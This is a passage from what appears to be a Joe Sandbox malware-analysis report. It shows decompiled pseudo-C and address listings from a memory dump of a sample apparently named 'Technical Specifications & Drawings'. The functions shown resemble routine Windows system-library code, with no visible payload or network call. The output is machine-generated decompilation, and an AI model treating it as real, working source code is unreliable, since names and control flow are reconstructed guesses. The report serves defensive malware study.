								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L017C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E017E9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                  0x017ac608
                                                  0x017ac615
                                                  0x017ac625
                                                  0x017ac62d
                                                  0x017ac635
                                                  0x017ac640
                                                  0x017ac680
                                                  0x017ac687
                                                  0x017ac688
                                                  0x017ac689
                                                  0x017ac694
                                                  0x017ac694
                                                  0x017ac642
                                                  0x017ac64a
                                                  0x017ac697
                                                  0x01817a25
                                                  0x01817a2b
                                                  0x01817a2e
                                                  0x01817a30
                                                  0x01817bea
                                                  0x01817bea
                                                  0x00000000
                                                  0x01817bea
                                                  0x01817a36
                                                  0x01817a43
                                                  0x01817a48
                                                  0x01817a4c
                                                  0x01817a4e
                                                  0x00000000
                                                  0x00000000
                                                  0x01817a58
                                                  0x01817a5a
                                                  0x01817a5b
                                                  0x01817a5c
                                                  0x01817a5d
                                                  0x01817a63
                                                  0x01817a64
                                                  0x01817a6a
                                                  0x01817a6c
                                                  0x01817a6e
                                                  0x018179cb
                                                  0x018179cb
                                                  0x018179ce
                                                  0x018179d0
                                                  0x01817a98
                                                  0x01817a9b
                                                  0x01817a9b
                                                  0x01817a9e
                                                  0x01817aa1
                                                  0x01817bbe
                                                  0x01817bbe
                                                  0x01817bc0
                                                  0x01817be0
                                                  0x01817be0
                                                  0x01817a01
                                                  0x01817a01
                                                  0x01817a05
                                                  0x01817a07
                                                  0x01817a15
                                                  0x01817a15
                                                  0x01817a1a
                                                  0x00000000
                                                  0x01817a1a
                                                  0x01817bc2
                                                  0x01817bc6
                                                  0x01817bc9
                                                  0x01817bcd
                                                  0x01817bcf
                                                  0x018179e6
                                                  0x018179e6
                                                  0x018179eb
                                                  0x018179eb
                                                  0x018179ef
                                                  0x018179f1
                                                  0x00000000
                                                  0x00000000
                                                  0x018179f3
                                                  0x018179f5
                                                  0x018179ff
                                                  0x018179ff
                                                  0x00000000
                                                  0x018179ff
                                                  0x018179f7
                                                  0x018179fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018179fd
                                                  0x01817bd5
                                                  0x01817bd8
                                                  0x00000000
                                                  0x00000000
                                                  0x01817ba9
                                                  0x01817bac
                                                  0x01817bb0
                                                  0x01817bb1
                                                  0x01817bb1
                                                  0x01817bb6
                                                  0x00000000
                                                  0x01817bb6
                                                  0x01817aa7
                                                  0x01817aaa
                                                  0x00000000
                                                  0x00000000
                                                  0x01817ab2
                                                  0x01817ab3
                                                  0x01817ab5
                                                  0x01817aec
                                                  0x01817aef
                                                  0x01817b25
                                                  0x01817b28
                                                  0x01817b62
                                                  0x01817b64
                                                  0x01817b8f
                                                  0x01817b92
                                                  0x01817b96
                                                  0x01817b98
                                                  0x00000000
                                                  0x00000000
                                                  0x01817b9e
                                                  0x01817b9f
                                                  0x01817ba3
                                                  0x00000000
                                                  0x01817ba3
                                                  0x01817b66
                                                  0x01817b68
                                                  0x01817ae2
                                                  0x01817ae2
                                                  0x00000000
                                                  0x01817ae2
                                                  0x01817b6e
                                                  0x01817b72
                                                  0x01817b75
                                                  0x01817b81
                                                  0x01817b85
                                                  0x01817b87
                                                  0x00000000
                                                  0x00000000
                                                  0x01817b31
                                                  0x01817b34
                                                  0x01817b3c
                                                  0x01817b45
                                                  0x01817b46
                                                  0x01817b4f
                                                  0x01817b51
                                                  0x01817b57
                                                  0x01817b59
                                                  0x01817b59
                                                  0x00000000
                                                  0x01817b59
                                                  0x01817b77
                                                  0x00000000
                                                  0x01817b77
                                                  0x01817b2a
                                                  0x00000000
                                                  0x01817b2a
                                                  0x01817af1
                                                  0x01817af3
                                                  0x00000000
                                                  0x00000000
                                                  0x01817afb
                                                  0x01817afc
                                                  0x01817afe
                                                  0x00000000
                                                  0x00000000
                                                  0x01817b00
                                                  0x01817b03
                                                  0x00000000
                                                  0x00000000
                                                  0x01817b05
                                                  0x01817b09
                                                  0x01817b0d
                                                  0x01817b0f
                                                  0x00000000
                                                  0x00000000
                                                  0x01817b18
                                                  0x01817b1d
                                                  0x00000000
                                                  0x01817b1d
                                                  0x01817ab7
                                                  0x01817ab9
                                                  0x00000000
                                                  0x00000000
                                                  0x01817abf
                                                  0x01817ac1
                                                  0x00000000
                                                  0x00000000
                                                  0x01817ac3
                                                  0x01817ac6
                                                  0x00000000
                                                  0x00000000
                                                  0x01817ac8
                                                  0x01817acc
                                                  0x01817ad0
                                                  0x01817ad2
                                                  0x00000000
                                                  0x00000000
                                                  0x01817adb
                                                  0x00000000
                                                  0x01817adb
                                                  0x018179d6
                                                  0x018179d9
                                                  0x018179dc
                                                  0x01817a91
                                                  0x01817a94
                                                  0x00000000
                                                  0x01817a94
                                                  0x018179e2
                                                  0x00000000
                                                  0x018179e2
                                                  0x01817a74
                                                  0x01817a7a
                                                  0x00000000
                                                  0x00000000
                                                  0x01817a8a
                                                  0x01817a21
                                                  0x01817a21
                                                  0x00000000
                                                  0x01817a21
                                                  0x017ac650
                                                  0x017ac651
                                                  0x017ac656
                                                  0x017ac65c
                                                  0x017ac65d
                                                  0x017ac663
                                                  0x017ac664
                                                  0x017ac66a
                                                  0x017ac66e
                                                  0x018179c5
                                                  0x018179c7
                                                  0x00000000
                                                  0x018179c7
                                                  0x017ac67a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d61e1d7817bd969c73dc30fe6874e4f9c26745b56d90cad327e3cfe6ed483a5
                                                  • Instruction ID: 64457cfe60fd247fa28eabba3567e9a6e222e8a70f93bf9c087b198afa71ab58
                                                  • Opcode Fuzzy Hash: 3d61e1d7817bd969c73dc30fe6874e4f9c26745b56d90cad327e3cfe6ed483a5
                                                  • Instruction Fuzzy Hash: 3681B2776042069FDB26CE58C880E6AB7EDFB84354F14485EEE45DB249D730EE44CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0183B8D0 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 39%
                                                  			E0183B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1897b9c; // 0x0
				_t124 = L017C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E017E9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E017E95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E017E95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L017C77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E017E9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E017E95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1897b9c; // 0x0
									_t92 = L017C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E017E9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E017AA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0183E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0183E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E017E95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                  0x0183b8d9
                                                  0x0183b8e4
                                                  0x00000000
                                                  0x0183b8e6
                                                  0x0183b8f3
                                                  0x0183b8f5
                                                  0x0183b8f5
                                                  0x0183b8f8
                                                  0x0183b920
                                                  0x0183b924
                                                  0x0183b936
                                                  0x0183b939
                                                  0x0183b93d
                                                  0x0183b948
                                                  0x0183b9a0
                                                  0x0183b9a0
                                                  0x0183b9a4
                                                  0x0183b9bf
                                                  0x0183b9c4
                                                  0x0183b9c6
                                                  0x0183b9cd
                                                  0x0183b9d1
                                                  0x0183bad4
                                                  0x0183bad8
                                                  0x0183bada
                                                  0x0183badc
                                                  0x0183badc
                                                  0x0183badf
                                                  0x0183bae0
                                                  0x0183bae2
                                                  0x0183bae4
                                                  0x0183baec
                                                  0x0183baee
                                                  0x0183baf0
                                                  0x0183baf0
                                                  0x0183baec
                                                  0x0183bafb
                                                  0x0183bafc
                                                  0x0183bafe
                                                  0x0183bb01
                                                  0x0183bb01
                                                  0x00000000
                                                  0x0183bb06
                                                  0x0183b9d7
                                                  0x0183b9db
                                                  0x0183b9db
                                                  0x0183b9de
                                                  0x0183b9de
                                                  0x0183b9e4
                                                  0x0183b9e7
                                                  0x0183b9ea
                                                  0x0183b9ec
                                                  0x0183b9ef
                                                  0x0183b9f3
                                                  0x0183ba1b
                                                  0x0183ba1b
                                                  0x0183ba23
                                                  0x0183ba24
                                                  0x0183ba27
                                                  0x0183ba2a
                                                  0x0183ba2b
                                                  0x0183ba2e
                                                  0x0183ba30
                                                  0x0183ba37
                                                  0x0183ba3f
                                                  0x0183ba9c
                                                  0x0183baa2
                                                  0x0183bb13
                                                  0x0183bb15
                                                  0x0183baae
                                                  0x0183baae
                                                  0x0183bab3
                                                  0x0183bab5
                                                  0x0183baba
                                                  0x0183bac8
                                                  0x0183bac8
                                                  0x0183baba
                                                  0x0183bacd
                                                  0x0183bacf
                                                  0x00000000
                                                  0x0183bacf
                                                  0x0183bb1a
                                                  0x00000000
                                                  0x0183bb1c
                                                  0x0183baa7
                                                  0x0183bb11
                                                  0x00000000
                                                  0x0183bb11
                                                  0x0183baa9
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0183ba41
                                                  0x0183ba41
                                                  0x0183ba41
                                                  0x0183ba58
                                                  0x0183ba5d
                                                  0x0183ba62
                                                  0x00000000
                                                  0x00000000
                                                  0x0183ba64
                                                  0x0183ba67
                                                  0x0183ba68
                                                  0x0183ba69
                                                  0x0183ba6c
                                                  0x0183ba6f
                                                  0x0183ba71
                                                  0x0183ba78
                                                  0x0183ba80
                                                  0x00000000
                                                  0x00000000
                                                  0x0183ba90
                                                  0x0183ba90
                                                  0x0183ba97
                                                  0x00000000
                                                  0x0183ba97
                                                  0x0183b9f5
                                                  0x0183b9f7
                                                  0x0183b9f7
                                                  0x0183b9fa
                                                  0x0183ba03
                                                  0x0183ba07
                                                  0x0183ba0c
                                                  0x0183ba10
                                                  0x0183ba17
                                                  0x00000000
                                                  0x0183b9f7
                                                  0x0183b9a6
                                                  0x0183b9a8
                                                  0x0183b9af
                                                  0x0183b9b3
                                                  0x00000000
                                                  0x00000000
                                                  0x0183b9b9
                                                  0x00000000
                                                  0x0183b9b9
                                                  0x0183b94d
                                                  0x0183b98f
                                                  0x0183b995
                                                  0x0183b999
                                                  0x0183b960
                                                  0x0183b967
                                                  0x0183b968
                                                  0x0183b96a
                                                  0x00000000
                                                  0x0183b96a
                                                  0x0183b99b
                                                  0x0183b99e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0183b99e
                                                  0x0183b951
                                                  0x0183b954
                                                  0x0183b95a
                                                  0x0183b95e
                                                  0x0183b972
                                                  0x0183b979
                                                  0x0183b97d
                                                  0x0183b97f
                                                  0x0183b980
                                                  0x0183b982
                                                  0x0183b984
                                                  0x00000000
                                                  0x0183b984
                                                  0x00000000
                                                  0x0183b926
                                                  0x00000000
                                                  0x0183b926

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3cab9272fbb651ff2c8a5f438c5c82775a4c0344a2e2544bd82c4c93456d964e
                                                  • Instruction ID: 03f9e095ab6e467bcbb55af1a21a49035c9876f080ed0be26062567443c69ae5
                                                  • Opcode Fuzzy Hash: 3cab9272fbb651ff2c8a5f438c5c82775a4c0344a2e2544bd82c4c93456d964e
                                                  • Instruction Fuzzy Hash: D871F4B2200B06AFE731CF18C848F56BBE5EB84724F19452CE655D72A1EB75EA41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01826DC9 Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E01826DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01826B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E017C7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E017E9AE0();
					_t87 = L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0182795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0182795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0182795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0182795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L017C4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01826B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01826B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01826B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01826B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E017C7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E017E9AE0();
								L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L017C2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L017C2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L017C2400( &_v52);
							}
							if(_v28 >= 0) {
								return L017C2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                  0x01826dd4
                                                  0x01826dde
                                                  0x01826de1
                                                  0x01826de3
                                                  0x01826de6
                                                  0x01826de9
                                                  0x01826dec
                                                  0x01826def
                                                  0x01826df2
                                                  0x01826df5
                                                  0x01826dfe
                                                  0x01826e04
                                                  0x01826e09
                                                  0x01826e0d
                                                  0x01826e18
                                                  0x01826e1b
                                                  0x01826e22
                                                  0x01826e2d
                                                  0x01826e30
                                                  0x01826e36
                                                  0x01826e42
                                                  0x01826e4d
                                                  0x01826e50
                                                  0x01826e55
                                                  0x01826e5c
                                                  0x01826e6e
                                                  0x01826e5e
                                                  0x01826e67
                                                  0x01826e67
                                                  0x01826e73
                                                  0x01826e74
                                                  0x01826e77
                                                  0x01826e7c
                                                  0x01826e7d
                                                  0x01826e8e
                                                  0x01826e93
                                                  0x01826e9c
                                                  0x01826ea8
                                                  0x01826eab
                                                  0x01826eac
                                                  0x01826eb3
                                                  0x01826ecd
                                                  0x01826edc
                                                  0x01826ee2
                                                  0x01826ee5
                                                  0x01826ef2
                                                  0x01826efb
                                                  0x01826f01
                                                  0x01826f06
                                                  0x01826f0b
                                                  0x01826f11
                                                  0x01826f1a
                                                  0x01826f22
                                                  0x01826f26
                                                  0x01826f26
                                                  0x01826f33
                                                  0x01826f41
                                                  0x01826f44
                                                  0x01826f47
                                                  0x01826f54
                                                  0x01826f65
                                                  0x01826f77
                                                  0x01826f7c
                                                  0x01826f82
                                                  0x01826f91
                                                  0x01826f99
                                                  0x01826fa3
                                                  0x01826fae
                                                  0x01826fae
                                                  0x01826fba
                                                  0x01826fbb
                                                  0x01826fbc
                                                  0x01826fc1
                                                  0x01826fc2
                                                  0x01826fd3
                                                  0x01826fd8
                                                  0x01826fd8
                                                  0x01826fdf
                                                  0x01826fe8
                                                  0x01826fee
                                                  0x01826fee
                                                  0x01826ff5
                                                  0x01826ffb
                                                  0x01826ffb
                                                  0x01827004
                                                  0x00000000
                                                  0x0182700a
                                                  0x01827004
                                                  0x01826eb3
                                                  0x01826e9c
                                                  0x01827015

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                  • Instruction ID: bcc9d13781c9e37037803d8dec71bd5dcee70aeb70e0322f68b21a54587bd468
                                                  • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                  • Instruction Fuzzy Hash: 51716E71A00619EFDB11DFA9C984EAEFBB9FF58710F104069E905E7250EB34EA41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A52A5 Relevance: .2, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E017A52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E017BEEF0(0x18979a0);
					_t104 =  *0x1898210; // 0x1262c78
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E017BEB70(_t93, 0x18979a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E017E9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E017BEEF0(0x18979a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E017BEB70(0, 0x18979a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1262c85
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E017DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E017BEEF0(0x18979a0);
									__eflags =  *0x1898210 - _t104; // 0x1262c78
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1898210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01824888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E017BEB70(_t95, 0x18979a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017E95D0();
											L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017E95D0();
											L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E017BEB70(_t93, 0x18979a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E017E95D0();
										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E017E95D0();
										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E017DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
